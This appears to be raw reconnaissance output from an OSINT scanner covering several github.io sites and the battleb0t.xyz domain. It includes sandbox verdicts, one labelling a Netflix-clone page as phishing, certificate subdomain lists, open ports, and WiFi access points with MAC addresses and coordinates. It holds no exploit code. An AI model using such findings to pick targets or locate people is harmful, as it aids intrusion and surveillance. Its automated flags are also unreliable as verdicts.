"RecoveryStore._B04A5EDD-EE0F-11ED-ACB1-080027098343_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "webcamoid_1_.png" has type "PNG image data 64 x 64 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "_B04A5EDF-EE0F-11ED-ACB1-080027098343_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_B797E09C-EE0F-11ED-ACB1-080027098343_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "main_1_.js" has type "C source ASCII text"- [targetUID: N/A]\n "mobile_1_.css" has type "ASCII text"- [targetUID: N/A]\n "reset_1_.css" has type "ASCII text"- [targetUID: N/A]\n "favicon_1_.png" has type "PNG image data 16 x 15 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "PTUKRQUT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\PTUKRQUT.txt]- [targetUID: 00000000-00003172]\n "51SURLHL.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\51SURLHL.txt]- [targetUID: 00000000-00003172]\n "VKBTY5T4.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\VKBTY5T4.txt]- [targetUID: 00000000-00003172]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "FG7SB3TD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FG7SB3TD.txt]- [targetUID: 00000000-00003172]\n "main_1_.css" has type "ASCII text"- [targetUID: N/A]\n "3F4OTZE6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3F4OTZE6.txt]- [targetUID: 00000000-00003172]\n "JBZG5CV8.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\JBZG5CV8.txt]- [targetUID: 00000000-00003172]\n "IW96THVI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IW96THVI.txt]- [targetUID: 00000000-00003172]\n "urlref_httpswebcamoid.github.io" has type "HTML document ASCII text"- [targetUID: N/A]\n "favicon_4_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts random domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"query.prod.cms.msn.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://webcamoid.github.io/"\n Pattern match: "https://webcamoid.github.io"\n Pattern match: "lY.UMDe/;+d*4IsQUA8[9D"\n Pattern match: "http://meyerweb.com/eric/ | 185.199.108.153 |
| 2023-05-12 02:50:45 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://khushishikhu.github.io/Netflix-clone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2868"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b34_IE_EarlyTabStart_0x87c_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b34_ConnHashTable<2868>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b34_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b34_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b34_IESQMMUTEX_0_519"\n "IsoScope_b34_IESQMMUTEX_0_331"\n "IsoScope_b34_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "172.64.133.15:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"khushishikhu.github.io"\n "use.fontawesome.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "Watch right on Netflix.com" (Indicator: "dir "; File: "Netflix-clone_1_.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "tab-content-1_1_.png" has type "PNG image data 879 x 622 8-bit/color RGBA non-interlaced" and extension "png"\n "TV-1_1_.png" has type "PNG image data 552 x 368 8-bit/color RGBA non-interlaced" and extension "png"\n "laptop1_1_.png" has type "PNG image data 543 x 319 8-bit/color RGBA non-interlaced" and extension "png"\n "tablet1_1_.png" has type "PNG image data 407 x 256 8-bit/color RGBA non-interlaced" and extension "png"\n "netflix-logo_1_.png" has type "PNG image data 624 x 390 8-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 879 x 622 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Solid family"- [targetUID: N/A]\n "TV-1_1_.png" has type "PNG image data 552 x 368 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "laptop1_1_.png" has type "PNG image data 543 x 319 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tablet1_1_.png" has type "PNG image data 407 x 256 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Regular family"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002868]\n "~DFEB8DE64FDEFEAC09.TMP" has type "data"- Location: [%TEMP%\\~DFEB8DE64FDEFEAC09.TMP]- [targetUID: 00000000-00002868]\n "~DF9B5BE8AAD9348E43.TMP" has type "data"- Location: [%TEMP%\\~DF9B5BE8AAD9348E43.TMP]- [targetUID: 00000000-00002868]\n "~DFA2CF22B23815D257.TMP" has type "data"- Location: [%TEMP%\\~DFA2CF22B23815D257.TMP]- [targetUID: 00000000-00002868]\n "netflix-logo_1_.png" has type "PNG image data 624 x 390 8-bit colormap non-interlaced"- [targetUID: N/A]\n "urlref_httpskhushishikhu.github.ioNetflix-clone" has type "HTML document ASCII text"- [targetUID: N/A]\n "RecoveryStore._B445AEB7-EF99-11ED-83C4-080027461EB8_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "style_1_.css" has type "assembler source ASCII text"- [targetUID: N/A]\n "_BBCECB40-EF99-11ED-83C4-080027461EB8_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_B445AEB9-EF99-11ED-83C4-080027461EB8_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "JS_1_.js" has type "ASCII text"- [targetUID: N/A]\n "ZIV20U3Z.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZIV20U3Z.txt]- [targetUID: 00000000-00002868]\n "2M1391EE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2M1391EE.txt]- [targetUID: 00000000-00002868]\n "1DIL5KRI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1DIL5KRI.txt]- [targetUID: 00000000-00002868]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "0LGY9LCX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0LGY9LCX.txt]- [targetUID: 00000000-00002868]\n "ORG2CQ19.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ORG2CQ19.txt]- [targetUID: 00000000-00002868]\n "NL66CHKW.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NL66CHKW.txt]- [targetUID: 00000000-00002868]\n "UB265V1X.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UB265V1X.txt]- [targetUID: 00000000-00002868]\n "Netflix-clone_1_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://khushishikhu.github.io/Netflix-clone/"\n Pattern match: "https://khushishikhu.github.io"\n Pattern match: "https://khushishikhu.github.io/Netflix-clone"\n Pattern match: "Bj.UUVP/0E{@mX+"\n Pattern match: "Wc.TJ/-tB@W;wsq}jP1"\n Pattern match: "https://fontawesome.comFont"\n Pattern match: "https://use.fontawesome.com/releases/v5.8.2/css/all.css"\n Pattern match: "SUIDmicrosoft.com/9216415687628831032347305882992031032230MUID3CFF7A16C8AC651E350B6918C9286478microsoft.com/1025428936550431110701305882992031032230_EDGE_Vmicrosoft.com/9216428936550431110701305898617031032230SRCHDAF=NOFORMmicrosoft.com/1024332378944031085"\n Pattern match: "SUIDmicrosoft.com/9216415687628831032347305882992031032230MUID3CFF7A16C8AC651E350B6918C9286478microsoft.com/1025428936550431110701305882992031032230SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482"\n Pattern match: "SUIDmicrosoft.com/9216415687628831032347305882992031032230SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743SRCHUSRDOB=20220131mi"\n Pattern match: "9216428936550431110701306257992031032230MUID34F5E2D5D7CC61EA0749F1DBD68060C6msn.com/1025428936550431110701306257992031032230"\n Pattern match: "MUIDB3CFF7A16C8AC651E350B6918C9286478 | 185.199.108.153 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | LF-X1U.00014A10EF0C (Net ID: 00:01:4A:10:EF:0C) | 37.780462,-122.390564 |
| 2023-05-12 02:54:23 | BGP AS Membership | No | Censys | 0 | 0 | 4 | 0 | None | 14618 | 2600:1f18:2489:8201::c8 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | WordPress (Category: blog)
https://profiles.wordpress.org/login/ | login |
| 2023-05-12 03:09:36 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 219.30.196.104.bc.googleusercontent.com | 104.196.30.219 |
| 2023-05-12 03:41:52 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 45.131.109.53:5985 | 45.131.109.53 |
| 2023-05-12 02:44:28 | Affiliate - Internet Name | No | DNS Resolver | 22 | 0 | 2 | 0 | None | battleb0t.github.io | www.battleb0t.xyz |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | UFUKDEN (Net ID: 00:02:CF:9F:96:D2) | 40.2024, 29.0398 |
| 2023-05-12 02:44:31 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | teamcity.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 03:23:19 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.5:443 | 188.114.96.0/24 |
| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [01039402468.github.io]
https://www.openphish.com/feed.txt | 01039402468.github.io |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | referrer-policy: same-origin | {"transfer-encoding": "chunked", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "server": "cloudflare", "connection": "keep-alive", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:20 GMT", "x-frame-options": "SAMEORIGIN", "referrer-policy": "same-origin", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f605eb97732c7-EWR"} |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Telegram (Category: social)
https://t.me/ayshoo | ayshoo |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | FurAffinity (Category: images)
https://www.furaffinity.net/user/login | login |
| 2023-05-12 03:19:24 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.109.154:443 | 185.199.109.0/24 |
| 2023-05-12 02:56:25 | BGP AS Membership | No | RIPE | 0 | 0 | 4 | 0 | None | 14061 | 207.154.224.0/20 |
| 2023-05-12 02:53:52 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8003::153:443 | 2606:50c0:8003::153 |
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 010pixel.github.io | 185.199.111.153 |
